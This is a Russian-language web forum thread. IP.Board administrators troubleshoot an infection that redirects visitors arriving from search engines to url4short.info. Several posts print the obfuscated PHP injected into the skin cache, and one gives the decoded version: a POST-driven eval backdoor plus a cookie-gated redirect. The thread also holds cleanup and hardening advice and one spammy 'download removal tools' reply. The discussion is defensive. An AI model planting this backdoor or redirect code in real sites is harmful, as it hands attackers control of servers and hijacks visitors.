Проблема такая:

При переходе на форум freedom-art с поисковиков(к примеру яндекс) перекидывает на _url4short.info/7de422bd (сайт на который льется наш трафик) Перекидывает всего один раз за сессию. Перелопатили все файлы, нечего подозрительного не нашли. Проверяли через хваленный AI-Bolit - тоже напрасно, он нечего не нашел. 

Для инфы, хостинг у нас не очень - ihc. Вроде бы убирали передаресация, а она все равно появилась, как - не знаем. Подозрение есть на хуки и модули, т.к. их многовато. Просьба помочь, т.к. трафик опять падет.

А платону написать в яндекс не судьба? что бы указали откуда слив идет. Была такая ситуация, отписал им туда, ответ пришел в течении нескольких часов с указанием файла и так же отписывал хостеру с такой проблемой тоже указал на файлы, так что можете попробывать хостеру своему отписать в ТП, но если он фуфлыжный как Вы сказали, следовательно от него можете не ждать чего то стоющего.

А платону написать в яндекс не судьба? что бы указали откуда слив идет. Была такая ситуация, отписал им туда, ответ пришел в течении нескольких часов с указанием файла и так же отписывал хостеру с такой проблемой тоже указал на файлы, так что можете попробывать хостеру своему отписать в ТП, но если он фуфлыжный как Вы сказали, следовательно от него можете не ждать чего то стоющего.

Хост сказал, что все хорошо, файлов вредоносных нет. 

Хост сказал, что все хорошо, файлов вредоносных нет. 

Напишите Платону посмотрим что ответит. А дальше видно будет что и как.

И по каким запросам слив трафика идет? потому что посмотрел сейчас, нормально все с яндекса идет на форум.

Напишите Платону посмотрим что ответит. А дальше видно будет что и как.

И по каким запросам слив трафика идет? потому что посмотрел сейчас, нормально все с яндекса идет на форум.

"фридом арт" по этому запросу, т.е. главной страницы, в .htaccess редиректа нет.

<IfModule mod_rewrite.c>
Options -MultiViews
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule .(jpeg|jpg|gif|png|js)$ /public/404.php [NC,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

.htacces так выглядит, Платон меня направил туда же, так же попросил сделать, что уже делал)

Этот эффект не был ваш сайт, но ваш компьютер - вирус.
Смотреть и скачать здесь removal tools

что в index.php ?

что в index.php ?

<?php
/**
 * <pre>
 * Invision Power Services
 * IP.Board v3.4.5
 * Main public executable wrapper.
 * Set-up and load module to run
 * Last Updated: $Date: 2013-02-26 08:08:06 -0500 (Tue, 26 Feb 2013) $
 * </pre>
 *
 * @author 		$Author: mark $
 * @copyright	(c) 2001 - 2009 Invision Power Services, Inc.
 * @license		__www.invisionpower.com/company/standards.php#license
 * @package		IP.Board
 * @link		__www.invisionpower.com
 * @version		$Rev: 12025 $
 *
 */	

define( 'IPB_THIS_SCRIPT', 'public' );
require_once( './initdata.php' );/*noLibHook*/

require_once( IPS_ROOT_PATH . 'sources/base/ipsRegistry.php' );/*noLibHook*/
require_once( IPS_ROOT_PATH . 'sources/base/ipsController.php' );/*noLibHook*/
ipsController::run();

exit();

и либо в initdata.php

 

либо же на форуме шел, и вам его стоит лечить айболитом

__revisium.com/ai/

 

и либо в initdata.php

 

либо же на форуме шел, и вам его стоит лечить айболитом

__revisium.com/ai/

форум лечили уже им

Такая же беда с пациентом 3.4.7
Выпали все странички из яшки. Написал Платону, на что был дан коротенький ответ

В данный момент перенаправления происходят на ресурс url4short.info. Когда они будут устранены, страницы сайта вернутся в поиск автоматически.

 
Копнул поиском и нашел таких проблем много.
Добавлю сюда для инфы
В кэш файл скина skin_global.php, а также и в кэш, расположенный в БД дописывается вот такой код:

$k='b2488714339183624a45a9373ae8d945';
$mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[Bs/uBvR(wvzgBgP[Bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[BZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq';
$jsa='jEK!u>WQ^CfRP98_%Xwtk&5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6';
$jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@';
$i='#c#'.substr($mds,213,1);
$ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css');

Если его декодировать
 

$i='ini_set';
if(function_exists($i)){
$i('display_errors',0);
$i('log_errors',0);
}
if(isset($_POST[$k]))eval(base64_decode(str_rot13($_POST[$k])));
$u=@preg_match('#bot|spider|crawl|slurp|yandex#i',$_SERVER['HTTP_USER_AGENT']);
$f=@parse_url($_SERVER['HTTP_REFERER']);
$c=@$f['host'];
$r=@preg_match('#live.com|google.|yahoo.|bing.com|yandex.ru|rambler.ru|baidu.#i',$c);
$h=$_SERVER['HTTP_HOST'];
$b=$this->settings['cookie_id'];
$g=$b.'session_id';
$e=$b.'lang_id';
$d=empty($_SERVER['HTTP_X_MOZ']);
if(empty($_COOKIE[$e])){
if(isset($_GET['ipbv'])&&(!empty($_GET['g']))&&(!empty($_COOKIE[$g]))){
if($c==$h){
if($d)setcookie($e,'en',time()+36000);
$m=substr(md5($h),0,8);
print("document.location='__url4short.info/{$m}'");
}
exit;}
if((!$u)&&$r){$IPBHTML.="";}
}

Причем стоит обратить внимание, что куки записываются на 10 часов - 36000 секунд.  Переходя из поиска к вам на сайт, пациента перекидывает на урл4шот.инфо Через 10 часов куки отваливаются и пациент будет заходить нормально.
 
Решение: Очистить от ЛИШНЕГО кода указанного выше, в файле /cache/skin_cache/cacheid_1/skin_global.php

 

Перестроить все кэши Внешний вид --->Инструменты

 

Надеюсь решение кому то может.

Edited 23 января, 20159 yr by pcmist

 

 

У меня такой вариант:

$pk='b16e523177731dcebff764b379878e77';
$rsa='!:`>rhU`K!%T.S!k^S!rnp*Fn">7`]F/JOex<">&5pJtU&g~`dF7O"]T`Og~kQ#*`b*s!QMs5[S*`Og+Up;aO"]Qk&FQkQkKC[*Inp*^n"}:JtF>kxn:kxCxP6|s<qtsJfmskqg>S[#*OtW-{tMUnAWNOb*sJOJmU[mf4Og>gZM0Jp]ZU"M>5Ag~k>FQUqe}CQ#*OtW-{tMUnAWNOb*s5HK*SHt|kAn>JtFz4OMZ`[#xB"n:SA}/kp>*JOni4qnmS"}ik"}tkxWi!d;7Jp]TB"*xP[M0{~]b]*]bdQSB];MeOt]HM]n0e{S;H>exOb*Inp4FeAWmkxg>Oq]QU[#*Otg;{>J;{>Kxb;M{{;FbM{J;{*]bnt~s<QMZ-{|*J>Kx`pF/S[SS<QMQ-{W+k&]xO"tmSpg^5[kZUp>"J]+74"Fz0pS:U"SKJ]+70A>m`pF:O[ai4&>7JQaZU"ti!d;7Jp]TO[aQSO}Q4dtfUp]QO[aQSO}f4d>*S]+70pJm4"]fU"FNO[ai`da/Sp;xk&zO[aiSp>7!O]QU;+70pnsS;+7UA*Z`bkKnpCs0A+*4/~Fnqe74"ix<QM^-bM0{~]b]*]bdQSB];MeO~m-{texOHK*4Z~*SpmskQ~GkmNrTq1Gk"]~Sp>7JqgUn"g:U"zsJ]FsJ[SS<QMx-bMfPfS/JOg/`dF7O">*n/K*JH~*4fTxUp;7JtFsJ[kInpeFJdt+SA*^n;FHM]ndM]nUn~m{];W0d;FgHt^xOb*I`d4^Jdt+SA*^n;F6H~FPb{]Unp]S5b>I`d4^`Og/JOe^n;FAM]MUn">+4x4xOb*&nf#mJdt+SA*^n;FAM]MUn"kxOb*snf4^Bd]zkAMa5[M0e~F-b~>;dQMxOb*s5OzsJf#*4/~Fnp#s!">&5[M*5Og>Spg:U"zsJb#*Jb+xJdTxPAMsUd{^5bK/gZ|+C[*Inp~Fkq]fkqMQ5pt*gb#*`[*KC[+T5Hz+k&>7S[#fJpFZSdt>Uxe7UpFZ4OMsU"TFn"m~SA|%PQFtk&+~k"m:kxe7`da&UQFInptFnQBs<qt>!p>~<qtsJf#^BbMt5b4&nABs!QMn{jnB]jtCPZ~f-AgZk&>+S[W~!OW>-bS~JOm~P"smS&/4qnskAexBAgQ4/~x!QM~`p>/PHa/JOM~`daxktKx4&Fmk&M0SOnKnttFP">7Jp]TPxW^k6Fskpn"-OK*SpmskQ~GkmNrTq1Gk&]x`Og~kx*z-&FtSAWtS[~GkmNrTq1G4da~`{gm4"m>bp;/`A~&4dt+<"kF`xCx-Z+:k"gQ`OW~-fBI0O~11l';
$pka='!+Fa[3S%s}<QL*DKI-xA?tuV$]2rzJ~^B.glo)b{1W:REej@dN6vn|XicM"=m`hGpU_Cf8kY5;/#q,OPT47wyZ9H>0(&';
$pkb='ew95C#d6pxOy&k<s7PnH:1$`"Vq(tZ0oI_N;?}SU)Bv=]QE+WrD/JA,[email protected][Mi-c^KFzg3|XL4Yu{>j*Tlf%m';
$f='%t%'.substr($rsa,718,1);
$klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html');

Найти бы корень зла...

Пароли менять точно не стоит ни на админа, ни на базу.

Один форум ради эксперимента оставил " не защищенным" и смотрю по логам что делают. 

 

1. Они ищут название админки. Сменить название папки в  обязательном порядке на 2857258927598275 или подобное.

2. Поставить права 444 на все файлы /cache/skin_cache/cacheid_1/skin_global.php (Во всех папках cacheid_1, cacheid_2 и т.д.) 

3. Добавить в папку cache .htaccess со следующим содержанием.

#<ipb-protection>
<Files ~ "^.*.(php|cgi|pl|php3|php4|php5|php6|phtml|shtml)">
    Order allow,deny
    Deny from all
</Files>
<Files ~ "^.*.(ipb)$">
Header set Content-Disposition attachment
</Files>
#</ipb-protection> 

Других вариантов я пока не нашел. 

 

Важно, при каких то изменениях со стилями(инструменты очистки, css, перестроении кэша) не забыть вернуть файлуфайлам, права обратно.

У меня такого кода нету в /cache/skin_cache/cacheid_1/skin_global.php

Установил обновление ip.board security update - вроде всё как яндекс показал, что вирусов больше нету.

Потом яндекс выдал одну страницу где вирус снова появился. Перечитал кучу интернета и нашел один способ, который реально помогает, но я не пойму как это правильно осуществить в деле. Помогите разобрать по пунктам.

 

Админов и модером прошу не удалять ссылку, т.к. она является решением борьбы с вирусом на сайте:peter.upfold.org.uk/blog/2013/01/15/cleaning-up-the-ip-board-url4short-mess/

У меня такого кода нету в /cache/skin_cache/cacheid_1/skin_global.php

Установил обновление ip.board security update - вроде всё как яндекс показал, что вирусов больше нету.

Потом яндекс выдал одну страницу где вирус снова появился. Перечитал кучу интернета и нашел один способ, который реально помогает, но я не пойму как это правильно осуществить в деле. Помогите разобрать по пунктам.

 

Админов и модером прошу не удалять ссылку, т.к. она является решением борьбы с вирусом на сайте:peter.upfold.org.uk/blog/2013/01/15/cleaning-up-the-ip-board-url4short-mess/

Подниму, тех поддержка форума, проблема очень актуальна. Большинство форумов ипб в выдаче идет с переадрисацией. Тоже помощь по пунктам бы. 

Опять что ли дыра? оО

Я сам с таким сталкивался, но на форуме подруги. Думал, она домен не продлила.

Опять что ли дыра? оО

Я сам с таким сталкивался, но на форуме подруги. Думал, она домен не продлила.

 

скорее всего не "опять", а кто-то забыл старые дыры залатать или просто не успел

Подниму, тех поддержка форума, проблема очень актуальна. Большинство форумов ипб в выдаче идет с переадрисацией. Тоже помощь по пунктам бы. 

поддержка, аууууууу, поможет кто чем сможет?

в файле /cache/skin_cache/cacheid_1/skin_global.php

 

был найден и удален следующий код:

$pk='b5c742b518ce6244a2407ff3dd9c3fcc';
$rsa='!:`>rhU`K!%T.S!k^S!rnp*Fn">7`]F/JOex<">&5pJtU&g~`dF7O"]T`Og~kQ#*`b*s!QMs5[S*`Og+Up;aO"]Qk&FQkQkKC[*Inp*^n"}:JtF>kxn:kxCxP6|s<qtsJfmskqg>S[#*OtW-{tMUnAWNOb*sJOJmU[mf4Og>gZM0Jp]ZU"M>5Ag~k>FQUqe}CQ#*OtW-{tMUnAWNOb*s5HK*SHt|kAn>JtFz4OMZ`[#xB"n:SA}/kp>*JOni4qnmS"}ik"}tkxWi!d;7Jp]TB"*xP[M0{~]b]*]bdQSB];MeOt]HM]n0e{S;H>exOb*Inp4FeAWmkxg>Oq]QU[#*Otg;{>J;{>Kxb;M{{;FbM{J;{*]bnt~s<QMZ-{|*J>Kx`pF/S[SS<QMQ-{W+k&]xO"tmSpg^5[kZUp>"J]+74"Fz0pS:U"SKJ]+70A>m`pF:O[ai4&>7JQaZU"ti!d;7Jp]TO[aQSO}Q4dtfUp]QO[aQSO}f4d>*S]+70pJm4"]fU"FNO[ai`da/Sp;xk&zO[aiSp>7!O]QU;+70pnsS;+7UA*Z`bkKnpCs0A+*4/~Fnqe74"ix<QM^-bM0{~]b]*]bdQSB];MeO~m-{texOHK*4Z~*SpmskQ~GkmNrTq1Gk"]~Sp>7JqgUn"g:U"zsJ]FsJ[SS<QMx-bMfPfS/JOg/`dF7O">*n/K*JH~*4fTxUp;7JtFsJ[kInpeFJdt+SA*^n;FHM]ndM]nUn~m{];W0d;FgHt^xOb*I`d4^Jdt+SA*^n;F6H~FPb{]Unp]S5b>I`d4^`Og/JOe^n;FAM]MUn">+4x4xOb*&nf#mJdt+SA*^n;FAM]MUn"kxOb*snf4^Bd]zkAMa5[M0e~F-b~>;dQMxOb*s5OzsJf#*4/~Fnp#s!">&5[M*5Og>Spg:U"zsJb#*Jb+xJdTxPAMsUd{^5bK/gZ|+C[*Inp~Fkq]fkqMQ5pt*gb#*`[*KC[+T5Hz+k&>7S[#fJpFZSdt>Uxe7UpFZ4OMsU"TFn"m~SA|%PQFtk&+~k"m:kxe7`da&UQFInptFnQBs<qt>!p>~<qtsJf#^BbMt5b4&nABs!QMn{jnB]jtCPZ~f-AgZk&>+S[W~!OW>-bS~JOm~P"smS&/4qnskAexBAgQ4/~x!QM~`p>/PHa/JOM~`daxktKx4&Fmk&M0SOnKnttFP">7Jp]TPxW^k6Fskpn"-OK*SpmskQ~GkmNrTq1Gk&]x`Og~kx*z-&FtSAWtS[~GkmNrTq1G4da~`{gm4"m>bp;/`A~&4dt+<"kF`xCx-Z+:k"gQ`OW~-fBI0O~11l';
$pka='!+Fa[3S%s}<QL*DKI-xA?tuV$]2rzJ~^B.glo)b{1W:REej@dN6vn|XicM"=m`hGpU_Cf8kY5;/#q,OPT47wyZ9H>0(&';
$pkb='ew95C#d6pxOy&k<s7PnH:1$`"Vq(tZ0oI_N;?}SU)Bv=]QE+WrD/JA,[email protected][Mi-c^KFzg3|XL4Yu{>j*Tlf%m';
$f='%t%'.substr($rsa,718,1);
$klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html');

После чего этот код удаляем и перестраиваем все стили Кеш.

Пишем в яндекс чтобы перепроверили сайт.

Удалил данные строки из файла и все равно сегодня этот код появился в файле. 

Как быть?

Добрый день.

Проблема актуально на 3.4.6

Убиваю код в файле skinglobal и кэше базы. перестраиваю кэши стиля. Сутки чисто. После, код появляется снова.

Как решить проблему, хелп.